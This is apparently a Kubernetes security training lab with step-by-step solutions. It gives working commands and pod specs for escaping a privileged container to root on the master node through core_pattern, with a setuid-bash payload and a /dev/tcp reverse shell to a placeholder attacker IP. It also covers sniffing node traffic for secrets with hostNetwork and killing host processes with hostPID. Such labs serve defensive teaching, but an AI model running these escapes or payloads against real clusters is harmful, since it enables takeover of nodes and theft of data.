Lab 7: Hacking From the Inside

1. Pod Breakout

Let's try creating a pod with the "privileged" attribute on the master node.

Hint

Make Pod Privileged:

securityContext:
      privileged: true

Hint

Run the Pod on a specific k8s node:

  nodeSelector:
    kubernetes.io/hostname: <NODE_HOSTNAME>

Hint

Use the following kubectl command to determine the node hostnames:

kubectl get nodes --show-labels

Solution

breakout_pod.yaml:

apiVersion: v1
kind: Pod
metadata:
  name: breakout
spec:
  containers:
  - name: breakout
    image: alpine
    command: [ "/bin/sh", "-c", "--" ]
    args: [ "while true; do sleep 30; done;" ]
    securityContext:
      privileged: true
  nodeSelector:
    kubernetes.io/hostname: <CURRENT_NODE>
  restartPolicy: Never

Note: Replace <CURRENT_NODE> with the hostname of the desired node.

Apply it using kubectl and check whether it started successfully:

kubectl apply -f breakout_pod.yaml
kubectl describe pod breakout

The pod did not start on the master node. How can we fix it?

Hint

https://kubernetes.io/docs/concepts/scheduling-eviction/taint-and-toleration/

Solution

Remove the taints from the master node so pods can be scheduled on it (the trailing "-" deletes a taint):

kubectl taint nodes --all node-role.kubernetes.io/control-plane-
kubectl taint nodes --all node.kubernetes.io/not-ready-
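Alternatively, the node taints can stay in place and the pod can tolerate them instead; a sketch to merge into the breakout pod's spec (the key matches the control-plane taint removed above):

```yaml
  tolerations:
  - key: node-role.kubernetes.io/control-plane
    operator: Exists
    effect: NoSchedule
```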

Delete and reapply the breakout pod:

kubectl delete -f breakout_pod.yaml
kubectl apply -f breakout_pod.yaml
kubectl describe pod breakout

The pod has started. Let's exec into it and break out of it to get "root" on the master node.

Solution

Start interactive alpine shell in the pod:

kubectl exec -it breakout -- /bin/ash

Use mount to confirm that "/proc" is mounted read-write and to find the "upperdir" location of the container's overlay filesystem:

mount
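The host-side path can be pulled straight out of the mount output; a sketch using a hypothetical mount line (inside the pod, pipe the real `mount` output through the same sed, the snapshot number 42 here is made up):

```shell
# Hypothetical overlay mount line as printed inside the pod (fields abridged)
line='overlay on / type overlay (rw,lowerdir=/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/41/fs,upperdir=/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/42/fs,workdir=/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/42/work)'
# Extract the upperdir; the numeric snapshot directory in this path is the
# <NUMBER> used when building the core_pattern path below
echo "$line" | sed -n 's/.*upperdir=\([^,]*\).*/\1/p'
# → /var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/42/fs
```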

Write the exploit file "exploit.sh":

  • local access exploit payload:

echo -e '#!/bin/bash \n cp /bin/bash / \n chmod 6711 /bash' > exploit.sh && chmod 555 exploit.sh
  • remote reverse shell payload:

echo -e '#!/bin/bash \n bash -i >& /dev/tcp/<Attacker_IP>/4444 0>&1' > exploit.sh && chmod 555 exploit.sh && echo do not forget to start a listener

Note: Replace <Attacker_IP> with a valid IP.
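The generated script can be sanity-checked in any Linux shell before pointing core_pattern at it (printf avoids echo -e's trailing space after the shebang; the setuid copy only takes effect once root executes the script):

```shell
# Build the local-access payload and verify its contents and mode
printf '#!/bin/bash\ncp /bin/bash /\nchmod 6711 /bash\n' > exploit.sh
chmod 555 exploit.sh
head -1 exploit.sh   # shebang must be the first line: #!/bin/bash
ls -l exploit.sh     # mode should be r-xr-xr-x
```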

Trigger exploit:

echo "| /var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/<NUMBER>/fs/exploit.sh #'" > /proc/sys/kernel/core_pattern
tail -f /dev/null &
kill -SIGSEGV $(pgrep tail)

Note: Replace <NUMBER> with the snapshot number from the upperdir path found via mount.
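Why this works: when a crashing process dumps core and core_pattern begins with "|", the kernel runs the named program as root in the host's namespaces, which is why the script path must be the host-side overlay path rather than the path inside the container. The active pattern can be inspected without root:

```shell
# Show the active core handler; after the exploit it should contain the
# pipe to the host-side exploit.sh path
cat /proc/sys/kernel/core_pattern
```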

2. Network Spoofing

Let's create a pod with the "hostNetwork" attribute.

Hint

Set "hostNetwork" Pod:

hostNetwork: true

Solution

network_pod.yaml:

apiVersion: v1
kind: Pod
metadata:
  name: network
spec:
  hostNetwork: true
  containers:
  - name: network
    image: ubuntu
    command: [ "/bin/sh", "-c", "--" ]
    args: [ "while true; do sleep 30; done;" ]

Use kubectl apply:

kubectl apply -f network_pod.yaml
kubectl describe pod network

Let's exec into the pod and install our tools to passively capture network traffic.

Hint

The ip and tcpdump tools will help!

Solution

Exec into the pod:

kubectl exec -it network -- /bin/bash

Install Tools:

apt-get update
apt-get install iproute2 tcpdump

Inspect network interfaces:

ip a

Capture network traffic on the loopback interface, writing the raw capture to capture.pcap while printing decoded packets live (-U flushes after each packet; tee duplicates the stream):

tcpdump -i lo -w - -U | tee capture.pcap | tcpdump -r -

Inspect traffic on the external interface (here ens160; substitute the interface name shown by ip a) and grep for a specific string:

tcpdump -i ens160 -X | grep -C 2 -i secret

Execute the following curl command from the jumphost to see the request captured by tcpdump (with hostNetwork enabled, the pod shares the node's IP address):

curl <Pod_IP>:10250/secret

Note: Replace <Pod_IP> with the pod's IP as reported by kubectl get pod network -o wide.

3. Node DoS

Let's create a "privileged" pod with the "hostPID" attribute.

Hint

Set "hostPID" Pod:

hostPID: true

Solution

dos_pod.yaml:

apiVersion: v1
kind: Pod
metadata:
  name: dos
spec:
  hostPID: true
  containers:
  - name: dos
    image: alpine
    command: [ "/bin/sh", "-c", "--" ]
    args: [ "while true; do sleep 30; done;" ]
    securityContext:
      privileged: true
  restartPolicy: Never

Use kubectl apply:

kubectl apply -f dos_pod.yaml
kubectl describe pod dos

Let's exec into the pod and try different actions such as:

  • listing all processes

  • killing processes

Hint

The ps and kill commands will help!

Solution

Exec into the pod:

kubectl exec -it dos -- /bin/ash

List all processes on the node (node daemons as well as the processes of other pods):

ps aux
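A quick confirmation that the PID namespace is shared: PID 1 seen from inside the pod is the node's init process, not the container's entrypoint (read via /proc, which also works with BusyBox's limited ps):

```shell
# Command name of PID 1; inside a hostPID pod this is the node's init
# (e.g. systemd), while an isolated pod would show its own entrypoint
cat /proc/1/comm
```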

Start a process (e.g. vi very_important_file) on the node in another terminal, then kill it from inside the pod:

ps aux | grep vi
kill -9 $(pidof vi)

4. Automated Tools - trivy

Let's see what can be identified with an automated scanning tool like "trivy".

Hint

https://github.com/aquasecurity/trivy

Solution

Get and run trivy:

wget https://github.com/aquasecurity/trivy/releases/download/v0.48.2/trivy_0.48.2_Linux-64bit.tar.gz
tar -xzvf trivy_0.48.2_Linux-64bit.tar.gz
./trivy k8s cluster --report summary --timeout 10m
